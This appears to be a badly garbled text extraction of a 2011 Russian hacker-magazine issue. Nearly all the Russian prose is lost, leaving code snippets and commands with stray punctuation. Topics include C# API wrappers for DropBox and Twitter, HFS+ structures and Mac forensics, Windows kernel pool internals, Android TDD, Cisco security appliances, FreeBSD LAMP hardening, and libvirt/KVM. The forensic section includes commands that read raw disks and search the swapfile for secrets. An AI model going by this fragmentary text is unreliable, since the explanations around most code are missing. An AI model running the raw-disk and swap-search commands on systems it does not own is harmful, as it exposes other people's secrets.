myStorage.DownloadFile("/MyPubarticle_for_x.txt ",
"C:\\");
//
//
//
if
{

,
(myStorage.IsOpened)
myStorage.Close();

web-. www.vr-online.ru.
.
. ,
, .
,
( ).
X 07 /150/ 2011

IEnumerable<TwitterStatus> mentions =
service.ListTweetsMentioningMe();

,
.
. ,

. ,
.

. , ,
. .
. ,
ICQ- (,
?). ,
, FB ..
,
( ). ,
.
, . ,
. ,
.
, .
-

099

CODING

3.
Facebook
Developer Toolkit

. ,
web-.

, ,
. . ,

. ,
. ,
. , , , .
.
.
, . . , , API? ,
.
. , ,
.
,
, .
, ? ! -,
, . , . , -.
,
.
. , , .


DropBox (dropbox.com). ,
DropBox, . DropBox ,
.
DropBox , . .
, DropBox
. , 2

100

. ?!
? , ,
, , DropBox
.
.
,
. ,
. , . ,
DropBox ,
. , API, .
C#, SharpBox
(sharpbox.codeplex.com). ,
DropBox .

DropBox. , 31 2010
.
, .
,
, .
, DropBox,
(https://www.dropbox.com/developers/
apps). application AppKey
AppSecret. ,
. , , VS, SharpBox
, . DropBox
.
DropBox.
.
(. ).

, .

Twitter. , , ,
, . ,
.
, .

X 07 /150/ 2011

-
using TweetSharp;
// TwitterService
//
// -
TwitterService myTwitterService = new TwitterService();
IEnumerable<TwitterStatus> tweets =
myTwitterService.ListTweetsOnPublicTimeline();
// . /
foreach (var tweet in tweets)
{
Console.WriteLine("{0} "{1}"",
tweet.User.ScreenName, tweet.Text);
}

. - ,
.
TwitterSharp. ,
.NET (2-4), Mono 2.6, Windows
Phone 7. WP7 .
, .
Twitter-
. Twitter-Sharp
, , , OAuth,
. .
, , .
. , .

, .
, ,
, . ,
.
, .
SDK

. , ,
. ,
Alfa, .
, , Silverlight vkontakte
API (silverlightvkapi.codeplex.com).
( , ..).
, .

Flickr

Flickr ,
, Yahoo.
, .
,
. Wikipedia, .
,
CodePlex FlickrNET API Library
(flickrnet.codeplex.com). ,
Flickr .
, DVD.
X 07 /150/ 2011


sharpbox.codeplex.com/documentation , DropBox
SharpBox.
sharpbox.codeplex.com
DropBox.
tweetsharp.codeplex.com
tweetsharp.
shorturlcreator.codeplex.com
.
? .
svapi.codeplex.com SilverLight API Connector .
ggltranslate.codeplex.com Google.
vkontakte.ru/developers.php
.
www.vr-online.ru/page/vr-online-dekabr-yanvar-3171
VROnline ,
Google
. .

Facebook

Facebook ,
:). ,
, .
, Facebook SDK, .. CodePlex, Facebook
/
. . ,
. ,
Facebook # SDK (facebooksdk.codeplex.com) Facebook Developer
Tookit (facebooktoolkit.codeplex.com).
/web/Silverlight-,
Facebook.
Windows Phone 7, ,
must have!
, . ? , Facebook C# SDK, FDT
.
Facebook,
www.facebook.com/#!/developers/
application.
DropBox. , , .
. FDT,
. FDT
, ..
. .


. , , SDK . ,
,
.
, . . ! z

101

CODING
(seva@vingrad.ru)

Mac OS X
,

. ,
, Mac OS X
, .
Intro

Mac OS, Apple HFS (Hierarchical File System).


HFS+, Mac OS,
8.1. , HFS+,
HFS, .
:

102

HFS
31
Mac Roman
512
2^31

HFS+
255
Unicode
4 K
2^63

, HFS+ , X 07 /150/ 2011

HFS+


HFS+ . , , journalInfoBlock , ,
allocationFile-,
, catalogFile .

HFS+

HFS .
16 , ,
65536 ,
. ,
.
HFS+ 32 ,
.
HFS+
.
:
Volume header ( ).
. , .
Allocation file ( ). Bitmap,
. (1 , 0
.)
Catalog file ().
.
Extents overflow file. , .
Attributes file ( ). ..
Journal file (). , .
Catalog file, extents overflow file attribute file
B-.
1024 .
X 07 /150/ 2011

HFS+
struct HFSPlusVolumeHeader
{
UInt16
signature;
UInt16
version;
UInt32
attributes;
UInt32
lastMountedVersion;
UInt32
journalInfoBlock;
UInt32
createDate;
UInt32
modifyDate;
UInt32
backupDate;
UInt32
checkedDate;
UInt32
fileCount;
UInt32
folderCount;
UInt32
blockSize;
UInt32
totalBlocks;
UInt32
freeBlocks;
UInt32
nextAllocation;
UInt32
rsrcClumpSize;
UInt32
dataClumpSize;
HFSCatalogNodeID
nextCatalogID;
UInt32
writeCount;
UInt64
encodingsBitmap;
UInt32
finderInfo[8];
HFSPlusForkData
allocationFile;
HFSPlusForkData
extentsFile;
HFSPlusForkData
catalogFile;
HFSPlusForkData
attributesFile;
HFSPlusForkData
startupFile;
};

catalog file
struct HFSPlusCatalogFile
{
SInt16 recordType;
UInt16 flags;
UInt32 reserved1;
HFSCatalogNodeID fileID;
UInt32 createDate;
UInt32 contentModDate;
UInt32 attributeModDate;
UInt32 accessDate;
UInt32 backupDate;
HFSPlusPermissions permissions;
FInfo userInfo;
FXInfo finderInfo;
UInt32 textEncoding;UInt32 reserved2;
HFSPlusForkData dataFork;
HFSPlusForkData resourceFork;
};

Catalog file
. Node ID (CNID)
. catalog file
,

103

CODING

Time Machine
(fork). , Extent overflow file.
fork-
struct HFSPlusForkData
{
UInt64 logicalSize;
UInt32 clumpSize;
UInt32 totalBlocks;
HFSPlusExtentRecord extents;
};

HFS+ , .
, , HFS+.

. ,
. , , HFS+,
Apple.

MacOS HFS HFS+


, ,
. - ,
HFS+ B-
. - ,
B- , . Mac OS X 10.2 2002
Apple HFS+, ,

104

.
. Mac OS X 10.2
. Mac OS X 10.3
. ,
Mac OS X .
HFS+
, .
. ,
, , :
Catalog file .
Bitmap ,
.
Extent overflow, .
.
, .
,
,
. .
HFS+ :
1. .
2. .
3. .
4. .
5. .
HFS+
.
, .
X 07 /150/ 2011

-
!


? :
1.
2. Catalog File
3.
4.
5.
6. , ( Bitmap),
.
,
. Mac-mini
5-10 . MacBook'
30 . Time Machine, 20 . ,
.
:
mkdir /Volumes/MyVolume
mount -t hfs -r /dev/diskXXXX /Volumes/MyVolume


, bitmap'
.
HFS+ ,
,
.
, . HFS+, ,
dd, ,
. , ,
:).
:
sudo dd if=/dev/disk1 of=./evidence bs=4096 \
skip=4355500 count=1

- ,
, , :
sudo cat /dev/disk1 | strings -o | grep -i \
'secret code' -C 5

,
.
, , , shred,
, .
Mac OS X /var/vm
$ ls -al /var/vm
total 131072
drwxr-xr-x 4 root wheel 136 Oct 14 10:50 .
drwxr-xr-x 24 root wheel 816 Oct 14 10:52 ..
drwx--x--x 18 root wheel 612 Oct 11 11:20 app_profile
-rw------T 1 root wheel 67108864 Oct 14 10:50 swapfile

, :
sudo strings -o /var/vm/swapfile | grep 'secret code' -C 2

X 07 /150/ 2011

,
.

raw-. , /dev/rdisk0s1 EFI , HFS+ /dev/
rdisk0s2. , hfs/hfs_format.h
HFS+, .
#import <hfs/hfs_format.h>
#import <util.h>
void dump(unsigned char * buf, size_t len)
{
for (size_t i = 0; i < len; ++i)
printf("%02X ", buf[i]);
}
int main(int argc, char *argv[])
{
//
// devopen
int fd = open("/dev/rdisk0s2", O_RDONLY );
// hfs_format.h
HFSPlusVolumeHeader volume_header;
// 1024
int rd = pread(fd, &volume_header,
sizeof(volume_header), 0x400);
//
//
printf("%u\n", volume_header.blockSize);
dump((char*)&volume_header, sizeof(volume_header));
//
close(fd);
}

, raw-,
sudo, .

Time Machine

Mac OS X Leopard, Time


Machine. ,
, . ,
,
.
Time Machine .
Apple Apple Time Capsule,

Time Machine. Time Machine
USB eSata-. Time Machine
, .
Time Machine .
, Time Machine, .

Outro

.
, ,
, . z

105

CODING
(stannic.man@gmail.com)

Windows? ,
, . , - ,
. ,
. .
, .
,
? , . - , ,
, PDE/
PTE- , ,
.
, , ArtMoney
.
? ,
? , . :).

Windows

, , .
, , .

106

, , , Windows API, . Windows ,


. Intel x86,
4096 . , / Windows
(ExAllocatePoolWithTag ExFreePoolWithTag),

. , .
.

Windows

Windows, -

X 07 /150/ 2011

1. WinDBG PCRB
(paged) (nonpaged).
, ,
,

pagefile.sys. , , paged- .
Nonpaged-
.

. ,
nonpaged
.

, .
][
Windows. ,
.
,
Windows
,
.

.
,
.

,
, .
,
,
X 07 /150/ 2011

,
,
.

.
.
, PPNPagedLookasideList (LookasideList),

nonpaged- <= 256
. PCR
(processor control
register), ,
IRQL, GDT, IDT .. , PCRB (processor control region),
(. . 1).
Windows Semerka KPRCB , , , KPRCB
:

HTTP://WWW
links
hackinthebox.org



.

typedef struct _KPRCB {


...
/*0x5A0*/ struct
_PP_LOOKASIDE_LIST PPLookasideList[16];
/*0x620*/ struct _GENERAL_LOOKASIDE_POOL
PPNPagedLookasideList[32];
/*0xF20*/ struct _GENERAL_LOOKASIDE_POOL
PPPagedLookasideList[32];
...
} KPRCB, *PKPRCB;

107

CODING

2.
MmNonPagedPoolFreeListHead
,

.

ExInterlockedPopEntrySList.
, , .
,
<= 4080 . , .
, POOL_DESCRIPTOR:
typedef struct _POOL_DESCRIPTOR
{
enum _POOL_TYPE PoolType;
union {
struct _KGUARDED_MUTEX PagedLock;
ULONG32 NonPagedLock;
};
LONG32 RunningAllocs;
LONG32 RunningDeAllocs;
LONG32 TotalBigPages;
LONG32 ThreadsProcessingDeferrals;
ULONG32 TotalBytes;
UINT8 _PADDING0_[0x2C];
ULONG32 PoolIndex;
UINT8 _PADDING1_[0x3C];
LONG32 TotalPages;
UINT8 _PADDING2_[0x3C];
VOID** PendingFrees;
LONG32 PendingFreeDepth;
UINT8 _PADDING3_[0x38];
struct _LIST_ENTRY ListHeads[512];
} POOL_DESCRIPTOR, *PPOOL_DESCRIPTOR;

, PoolVector
NonPagedPoolDescriptor.

108

,
ExpNonPagedPoolDescriptor, 16 ,
.
PRCB KNODE,
,
ExpNonPagedPoolDescriptor.
,
MmNonPagedPoolFreeListHead, , ,
4080 . , .
LIST_ENTRY,
, , ( ) ,
.
,
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
,
MmNonPagedPoolFreeListHead .
, , . ,
,
:). , , .

...

, .
, ,
, .
,

. . ,
, Windows Vista/7 .
.
: ,
,
!
(. . 2).
() Windows. , Next Lookaside, PoolOverflow () PendingFrees
( ) ..
, .
,
.
, , , , ...

, , ,
, .
, ,
. ,
Windows
,
.
! z
X 07 /150/ 2011

1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! ,
.
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )

12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

CODING
RankoR (rankor777@gmail.com, ax-host.ru)

,
: TDD Android

( , )
, . ,
.


20%- 80% . , . ,
, ,
1. ,

(, , ).
.
- (. 1),
, , ,
, -
.

.
, . , .
(. unit testing) , , ,
.
, , , . ,
int32,
,
.
, .
, TDD (. Test Driven Development),
.
, (
) , TDD
, . TDD
2. ,
, , , ,
.

110

1.
test case
.
.
,
test case 1-2 .
,
.



,


X 07 /150/ 2011

2. TDD
, .
5. .

, . ,
, ,
, ,
. ,
,
,
.


, ,
TDD: ,
- , .
:
1. - (
). ,
,
.
2. . ,
boolean,
return false (
,
true), , .
, .
3. ,

. , .
4. , .
X 07 /150/ 2011

( ) Android.
Android, , Java.

, ,
DVD
true false. , , ,
, 1, 2, 3 ..
dvd
, -

.
( Android (,
, , )
, Eclipse, ADT Android SDK)
. ,
Next
Create a test project.
INFO
.
Java- -
JUnit. JUnit Android SDK, info
, Android .

Wikipedia
.
TestSuite ( ), TestCase .
,
().

111

CODING

,
test, JUnit , , :).
, <Ctrl> + <F11>.
, Matrix
orderIsRight().
, : return false. ,
: ,
. ,
(, , ) .
orderIsRight() :
public static boolean orderIsRight(
final List<Point> pPoints) {
Point firstPoint = pPoints.get(0);
for (int i = 1; i < pPoints.size(); i++) {
final Point secondPoint = pPoints.get(i);
if (pointsAreInWrongOrder(firstPoint,
secondPoint)) {
return false;
}
firstPoint = secondPoint;
}
return true;
}

pointsAreInWrongOrder() ,
:
return (pFirstPoint.x >= pSecondPoint.x);

, true, , ( ).
. ,
.
.

Android
,
.
public void testValidOrder() {
List<Point> points = new ArrayList<Point>();
points.add(new Point(0, 0));
points.add(new Point(1, 0));
points.add(new Point(2, 0));
points.add(new Point(3, 0));
boolean result = Matrix.orderIsRight(points);
assertTrue(result);
}
public void testInvalidOrder() {
List<Point> points = new ArrayList<Point>();
points.add(new Point(0, 0));
points.add(new Point(3, 0));
points.add(new Point(1, 0));
points.add(new Point(2, 0));
boolean result = Matrix.orderIsRight(points);
assertFalse(result);
}

112

GUI

.
GUI , , ,
. GUI ,
,
. ,
, . ,
, , , ,
, .
Android SDK
, ActivityInstrumentationTestCa
se2.
GUI. , ActivityInstrumentationTest
Case2 , ..
class MainActivityTest extends ActivityInstrumentationTestCase2<Mai
nActivity>.
Activity (MainActivity),
. , .
Android 2.3.4 Wi-Fi.
, Wi-Fi
, , . X 07 /150/ 2011


, Adb over
Wi-Fi Android Market (
root). . ,
:

GUI
adb connect 192.168.1.5:31337

GUI ,
. , setUp(),
. , Activity,
:
private
private
private
private

Activity
EditText
EditText
EditText

mActivity;
mEditText1;
mEditText2;
mEditText3;

:
protected void setUp() throws Exception {
super.setUp();
mActivity = getActivity();
mEditText1 = (EditText)mActivity.findViewById
(com.example.matrix.R.id.editTextLine1);
<...>
mTextView = (Button)mActivity.findViewById(
com.example.matrix.R.id.textView);
}

, :
public void testControlsCreated() {
assertNotNull(mActivity);
assertNotNull(mEditText1);
<...>
assertNotNull(mTextView);
}

,
, , , - - .
,
textView (OK NOT OK).
X 07 /150/ 2011

:
public void testValidData() {
TouchUtils.tapView(this, mEditText1);
sendKeys(KeyEvent.KEYCODE_0, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText2);
sendKeys(KeyEvent.KEYCODE_1, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText3);
sendKeys(KeyEvent.KEYCODE_2, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText1);
assertEquals("OK", mTextView.getText());
}

, . EditText
. -
, , . , -
, ,
:).
,
, Activity ( Activity ) :).

, .
Java Android
JUnit, .
, ,
, ,
,
. z

113

SYN/ACK
grinder (grinder@tux.in.ua)

CISCO

. .
-, VPN; ,
. ,
Cisco, .

IronPort

Cisco , ,
.
.
, , ,
. , ,
.
-,
. , ,
, .
,
.
, , ,
SaaS .
, .
. Cisco Cisco IronPort Systems LLC
(ironport.com), - ,
-,
. IronPort .
E-mail Security Appliance
( C-Series X-Series, - Web Security
Appliance (S-Series). M-Series.
,
, . M-Series
,
. IronPort .
(,
FTP-).
, WCCPv2 (Web Cache
Communication Protocol). . IronPort
AsyncOS, FreeBSD-

.
10000 ,
DOS-. AsyncOS -

114

- (Unix Shell ).
,
, (FTP, HTTP(S)).
IronPort
SensorBase. ,
SenderBase .

, SensorBase .
Risk Rating. . Cisco, ,
, ,
30% ,

. IP-
-10 +10. . , ,
200 . , IP-
, IronPort
. ,
(malware, , ..).
, 80%
-
, .
. , , -
Waledac ,
, IronPort, . ,
, SpamAssassin, ,
. IronPort
Risk Rating (,
..), ,
. ,
: , :).
, SensorBase .
, ,
, SensorBase IP-.
, IronPort :
- Anti-Spam Filters CASE
(Context Adaptive Scanning Engine, ), ;
;
- (Cisco IronPort URL Filters),

80- ;
X 07 /150/ 2011

CISCO
Cisco,
. .
eBay
$100 (),
. , ,
, . .
!
Cisco Packet
Tracer (cisco.com/web/learning/netacad/course_catalog/PacketTracer.html),
. PT

.
Cisco (,
, , VPN ..), ,
, .
,
Cisco, RT
.
Packet Tracert Windows XP-7
Linux.
RT Dynamips (ipflow.
utc.fr/index.php/Cisco_7200_Simulator) GNS3 (gns3.net).

(IronPort Virus
Outbreak Filters), ,
(Sophos, McAffee);
IronPort, ;
DLP-,
( ).
,
. , IM, Skype, -.
;
- ;
X 07 /150/ 2011

- ( URL, HTTP-
, IronPort
).
-
.
, ,
. IronPort
- .
LDAP-, Active
Directory. IronPort , ,
. Reputation Filter,
DLP
. , .
, IronPort
.
. , ironport.com/try,
.

ASA 5500

,
Cisco, Cisco ASA 5500
Series, (ASA Adaptive Security Appliances),
PIX. ASA 5500
Cisco SDN (Self Defending
Networks, bit.ly/kKmBD5). ASA 5500 , , Adaptive Threat Defense,
.
, VPN
( SSL IPsec), IPS ( ),
URL -,
,
, , Anti-X (
). , , ASA 5500
, .
5500. 2-7

115

SYN/ACK

Cisco
MARS
eBay Cisco

Cisco ASA 5505


, IM P2P, , . ,

.
. , ,
,
,
( 80). ASA 5500
. Cisco SSL VPN Cisco AnyConnect Cisco Secure Desktop (CSD).
CSD ,
, .

, , , IP-,
. VPN
, LAN (CIFS, HTTP/S, FTP).
, .
VM. .
QoS, , IPv6 , ASA 5500 .
ASA 5500 ,
,
, , DMZ. firewall
, ASA 5500 .
, , (
enterprise-),
, .
, Cisco ASA 5505
Base Security Plus, -

116

10000 25000 , 10 25
2 VPN, . ,
eBay / ASA 5505 $150,
.
, VPN, GTP/GPRS . VPN-, , ,
ASA 5520
750.
5500 . ,
OpenSource- (Squid, HAVP, SquidGuard, ClamAV, OpenDPI,
OpenVPN ), ,
, . , ,
.
, .
, ?
, ,
( Cisco
? - ! . .).
Cisco
,
. ,
, - .
, .
ASA 5500 Series (, , )
, . ,
, AIP-SSM (Advanced Inspection and Prevention Security
Services Module) CSC-SSM (Content Security and Control Security
Services Module). Cisco
, .

Cisco MARS

SDN Cisco MARS (Monitoring Analysis and Response


System). ( Cisco
NetFlow), . ,
, .
, Cisco ISS
RealSecure Network, McAfee IntruShield/Entercept HIDS, Juniper IDP,
Snort .
X 07 /150/ 2011

Cisco
Cisco Configuration Professional
Cisco Packet Tracert

Cisco GNS3
.

(Qualys Guard ANY, E-Eye, Retina Scanner Vulnerability
CVE).

.
,
.
,
, .
, , .
150 . e-mail, , SNMP.
, , firewall, IDS/IPS ..
X 07 /150/ 2011

,
, .
, MARS
. , Cisco end-of-life , 2011 .
2015 . MARS
, Cisco Security
Manager.

Cisco , , ,
. , ,
*nix,
. z

117

SYN/ACK
(execbit.ru)

Clipboard blocked!
Clipboard blocked!

Apache, MySQL PHP, LAMP,


Linux.
FreeBSD .
,
, FreeBSD (L)AMP
,
.

1. FreeBSD

. FreeBSD (www.freebsd.org), Get


FreeBSD Now, ( : 8.2-RELEASE 7.4-RELEASE), (amd64 i386), [ISO]
. : bootonly
, disk1 ISO CD, dvd1
DVD, livefs LiveCD , memstick
USB-.
, DHCP-, (DVD-
, CD ).
, ISO-, , / . .

sysinstall,
. : Express,
,
, . , <Enter>.
.
<A> , <C>,
. , ,
FreeBSD
DOS- ( FreeBSD ) BSD-,
.
<Q>, .
: ,
<Enter> MBR.
BSD-.
,
<A> . <Q>,
.
: .
CD/DVD, <Enter>. <Enter> .
,
. <Enter>, <X>, Yes
<Enter>. . ,
.
root .

118

2.

FreeBSD, ,
: , root , . .
-, root :
# passwd

.
,
SSH.
adduser:
# adduser

,
( <Enter>),
, (
tcsh) . ,
yes ( ),
no.
root,
wheel:
# pw groupmod wheel -m _

/etc/fstab , ,
/tmp /var.
noexec Options ( ).
:
#
#
#
#
#

chmod
chmod
chmod
chmod
chmod

0600
0600
0600
0600
0600

/etc/syslog.conf
/etc/rc.conf
/etc/newsyslog.conf
/etc/hosts.allow
/etc/login.conf

. FreeBSD
/etc/rc.conf, :
# ee /etc/rc.conf
hostname="host.com"
ifconfig_em0="inet 1.2.3.4 netmask 0xffffffff"
defaultrouter="5.6.7.8"

em0
.
ifconfig.
X 07 /150/ 2011

DHCP, dhclient.
:
# ee /etc/rc.conf
#
#
icmp_drop_redirect="YES"
icmp_log_redirect="YES"

# /etc/rc.d/netif retstart

:
# ping execbit.ru

/etc/sysctl.conf:

# ping-
icmp_bmcastecho="NO"

#
#
#
#

# /tmp
clear_tmp_enable="YES"

net.inet.tcp.blackhole=2
net.inet.udp.blackhole=1

# /etc/motd
update_motd="NO"

# root
kern.ps_showallprocs=0

#
# SYN FIN
tcp_drop_synfin="YES"
# sendmail
sendmail_enable="NO"
sendmail_submit_enable="NO"
# SSH
sshd_enable="YES"

, <Esc> <A>.
DNS- /etc/resolv.conf:
# ee /etc/resolv.conf
nameserver 8.8.8.8

,
:
X 07 /150/ 2011

ee /etc/sysctl.conf

( DoS-
)

SSH- -:
# echo "MaxStartups 5:50:10" >> /etc/ssh/sshd_config
# /etc/rc.d/sshd restart

SSH- 50%
, .
, .
-, ( )
FreeBSD ,
( , ,
):
# portsnap fetch extract

, :

119

SYN/ACK

Webmin
# freebsd-update fetch
# freebsd-update install
# shutdown -r now

, rkhunter, ,
:
# cd /usr/ports/security/rkhunter
# make install clean

/usr/local/etc/rkhunter.
conf , MAIL-ON-WARNING email,
.
:
# rkhunter --update

,
:

# crontab -e
0 2 * * * root

/usr/local/sbin/ntpdate

pool.ntp.org

, Webmin, web-
(,
SSH, ):
# cd /usr/ports/sysutils/webmin
# make install clean
# echo 'webmin_enable="YES"' >> /etc/rc.conf

Webmin:
# /usr/local/lib/webmin/setup.sh

<Enter>,
( Login password:), Webmin (,
). Webmin:
# /usr/local/etc/rc.d/webmin start

# rkhunter --propupd

/etc/periodic.conf ,

:
# echo 'daily_rkhunter_update_enable="YES"' > \
/etc/periodic.conf
# echo 'daily_rkhunter_check_enable="YES"' > \
/etc/periodic.conf

, /var/log/rkhunter.log
email.
cron
:

120

, https://host.com:10000/
.

AMP

AMP, -
Apache, MySQL PHP.
Apache. :
# cd /usr/ports/www/apache22
# make config install clean

,

. - ,
<Enter>.
X 07 /150/ 2011

/tmp /var
( SSL ,
):
# echo 'apache22_enable="YES"' >> /etc/rc.conf
# echo 'apache22ssl_enable="YES"' >> /etc/rc.conf


accf_http, HTTP, SYN-:
# echo 'accf_http_ready="YES"' >> /etc/rc.conf
# kldload accf_http

PHP :
# cd /usr/ports/lang/php5
# make config install clean

, Build Apache module .


:

FreeBSD
# mkdir /home/www/cgi-bin

/
home/www , -, /home
( ,
, /home
), -, , /usr/local/www/apache22/data,
.
4. :
<Directory /usr/local/www/apache22/data>

,
DocumentRoot:
<Directory /home/www/data>

5. :
<ifModule dir_module>

# cd /usr/ports/lang/php5-extensions
# make config install clean

, PHP MySQL database support,


PHP MySQL.
.
Apache
( FreeBSD : /usr/local/etc/apache22/
httpd.conf) :
1. LoadModule :
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

2. ServerAdmin :
ServerAdmin me@site.com

3. DocumentRoot , -:

DirectoryIndex index.html
</ifModule>

:
<ifModule dir_module>
DirectoryIndex index.php index.html
</ifModule>

6. <ifModule alias_module> :
ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/"

:
ScriptAlias /cgi-bin/ "/home/www/cgi-bin/"

7. :
<Directory "/usr/local/www/apache22/cgi-bin">

:
DocumentRoot "/home/www/data"

<Directory "/home/www/cgi-bin">

PHP:
# mkdir /home/www
# mkdir /home/www/data
X 07 /150/ 2011

# cp /usr/local/etc/php.ini-recommended /usr/local/etc/php.ini

121

SYN/ACK


Apache
PHP. MySQL.
:
# cd /usr/ports/databases/mysql50-server
# make WITH_OPENSSL=yes install clean

,
:
# ee /etc/my.cnf
[client]
port=29912
[mysqld]
port=29912
bind-address=127.0.0.1

PHPMyAdmin,
web-:
# cd /usr/local/www/phpMyAdmin
# cp config.sample.inc.php config.inc.php
# ee config.inc.php
$cfg['blowfish_secret'] = '';

Apache
:
1. <IfModule alias_module> :
Alias /phpmyadmin /usr/local/www/phpMyAdmin

2. <Directory> :

MySQL :
# echo 'mysql_enable="YES"' << /etc/rc.conf
# /usr/local/etc/rc.d/mysql-server start

:
# mysqladmin -u root password
# mysql -u root -p

MySQL ,
, ,
MySQL,
- . - MySQL
PHPMyAdmin:
# cd /usr/ports/databases/phpmyadmin
# make install clean

122

<Directory "/usr/local/www/phpMyAdmin">
Order allow,deny
Allow from all
</Directory>

Allow from all - Allow


from 123.456.789.0/12, PHPMyAdmin
.
Apache:
# /usr/local/etc/rc.d/apache22 restart

, (L)AMP .

HTTPS

PHPMyAdmin HTTPS,
X 07 /150/ 2011

Apache PHP
,
. , Apache
.
OpenSSL (/etc/ssl/
openssl.cnf), :
#
dir = /root/sslCA
# (~10 )
default_days = 3650


:
#
#
#
#
#
#
#

cd /root
mkdir sslCA
chmod 700 sslCA
chmod 700 sslCA
mkdir private
cd sslCA
openssl req -new -x509 -days 3650 -extensions v3_ca \
-keyout private/cakey.pem -out cacert.pem \
-config /etc/ssl/openssl.cnf

, :
# ls -l cacert.pem private/cakey.pem

Apache /etc/
ssl:
# cd /root/sslCA
# openssl req -new -nodes -out _-req.pem \
-keyout private/_-key.pem -config /etc/ssl/openssl.cnf
# openssl ca -config /etc/ssl/openssl.cnf -out \
_-cert.pem -infiles _-req.pem
X 07 /150/ 2011

# cp /root/sslCA/_-cert.pem /etc/ssl/crt
# cp /root/sslCA/private/_-key.pem /etc/ssl/key

Apache, :
# ee /usr/local/etc/apache22/httpd.conf
#Include etc/apache22/extra/httpd-ssl.conf

/usr/local/etc/apache22/extra/
http-ssl.conf:
# ee /usr/local/etc/apache22/extra/http-ssl.conf
# HTTPS-
ServerName ssl.host.com
# ,
SSLCertificateFile /etc/ssl/crt/yourhostname-cert.pem
SSLCertificateKeyFile /etc/ssl/key/yourhostname-key.pem
# ,
DocumentRoot "/home/www/data"
#
ErrorLog "/var/log/httpd-error.log"
TransferLog "/var/log/httpd-access.log"

Apache:
# /usr/local/etc/rc.d/apache22 restart

,
(L)AMP FreeBSD ( FAMP), ,
,
/home/www/data ( /home/www/cgi-bin).
(L)AMP. z

123

SYN/ACK
(execbit.ru)



QEMU, KVM, ,
,
. , .
, KVM QEMU ,
,
. QEMU

.
KVM , .
,
,
.
QEMU+KVM
,

QEMU.

virsh

virt-install,
- ,
virsh,
(, , libvirt,
):

, QEMU+KVM.
,
,
. ,
libvirt.
Libvirt ,
. ,
libvirt, , -,
,
. -, libvirt , KVM Xen
VMware OpenVZ. ,
,
( , , libvirt,
).
-, libvirt ,
, -
, .
, libvirt,
.

124

virsh libvirt.
,
. ,
,
libvirt,
, virsh .
virsh libvirt,

( KVM, QEMU, dnsmasq bridge-utils).
,
( Ubuntu):
$ sudo apt-get install bridge-utils dnsmasq kvm \
qemu libvirt libvirt-bin

$ sudo apt-get install virtinst

virsh ,
libvirtd.

, (, ArchLinux)
. , libvirtd :
$ ps ax | grep libvirtd

, (
init.d rc.d):
$ sudo /etc/init.d/libvirtd start

:
$ sudo virsh --connect qemu:///system version
$ sudo virsh --connect qemu:///system list

X 07 /150/ 2011

virt-install

ACPI

virt-install .
,
, '-d',

~/.virtinst/virt-install.log.


ACPI,
QEMU. ,
'--noacpi' '--noapic'
( ) virt-install.

INFO

info



:
sudo virsh attach-disk

,
:
: libvir 0.9.0
: libvir 0.9.0
API: QEMU 0.9.0
: QEMU 0.14.0

.
virsh '--connect'
(sudo virsh version), libvirt
.
,
'--connect'. libvirt

SSH-. ( '-c' '--connect'):
$ virsh -c \
qemu+ssh://root@host.com/system

. ,
, virsh.
, , , .

virt-install :
X 07 /150/ 2011

$ sudo virt-install --connect qemu:///system \


--name vm1 \
--ram 512 \
--vnc \
--os-type linux
--os-variant ubuntumaverick \
--accelerate \
--network=network:default \
--disk \
path=/var/lib/libvirt/images/vm1.img,size=5 \
--cdrom /tmp/ubuntu-10.10-server-i386.iso \
--noautoconsole

--driver file --type


cdrom --mode readonly
/var/lib/libvirt/
images/cdrom.iso sdc


:
# virsh dumpxml vm1 >
~/vm1.xml
# vi vm1.xml
# virsh create vm1.xml


QEMU.
vm1 ( '--name'), 512
('--ram'),
VNC- ( ,
).

Linux ('--os-type linux')
Ubuntu 10.10 ('--os-variant
ubuntumaverick'),
('--accelerate').
'network' .
:
1. bridge:_

125

SYN/ACK

virt-manager


Ubuntu
1. /etc/network/interfaces,
(
IP-, ):
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
address 192.168.0.10
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
bridge_ports eth0
bridge_fd 9
bridge_hello 2
bridge_maxage 12
bridge_stp off

2. :
$ sudo /etc/init.d/networking restart

3. dhcdbd:
$ sudo /etc/init.d/dhcdbd stop
$ sudo update-rc.d -f dhcdbd remove

.
. ,
( Ubuntu).
2. network:_
. ,
, NAT. ,
, - .
_ /var/lib/
libvirt/network, xml.
, :
# virsh net-list --all

126

virt-df
3. user , SLIRP.
,
.
'--disk' libvirt
, .
,
'size'. 'sparse', ,
(sparse=true, )
(sparse=false).
,
, 'size'.
. ,
, -,
, -,
.
/var/
lib/libvirt/images LVM- ( NFS
POHMELFS, ). ,
.
'--cdrom'
ISO-. ,
/tmp .
,
ISO-:
--cdrom ftp://host.com/images/ubuntu/

, initrd,
:
--location http://ftp.us.debian.org/debian/dists/etch/
main/installer-amd64/

, , . X 07 /150/ 2011

virt-manager
('--noautoconsole')
. 'vcpus'
'cpuset',

( , ).
, /etc/libvirt/qemu/vm1.xml
.

'virsh list'. , .
.
,
virt-viewer,
:
$ sudo apt-get install
$ virt-viewer -c qemu:///system test

X 07 /150/ 2011

, virt-install
. ,
, , , .

,
'console vm1',
'dominfo vm1', - (
libvirtd) 'autostart
vm1', ( 'save'),
('resume '), ('shutdown'), ('start'),
('destroy'),
('attach-device'),
,
:

WARNING
warning
SeLinux,
Fedora
,


,
/var/lib/libvirt/
images.

$ sudo virt-clone \
--connect=qemu:///system -o vm1 -n vm2


vm2,

127

SYN/ACK

virt-manager
vm1, .
'virt-clone' , , .

, libvirt-
:
$ sudo virsh migrate --live vm136 \
qemu+ssh://host2.com/system

:
$ sudo virsh qemu+ssh://host2.com/system list

virsh
, , GUI web-,
. virt-manager,
.

virt-manager

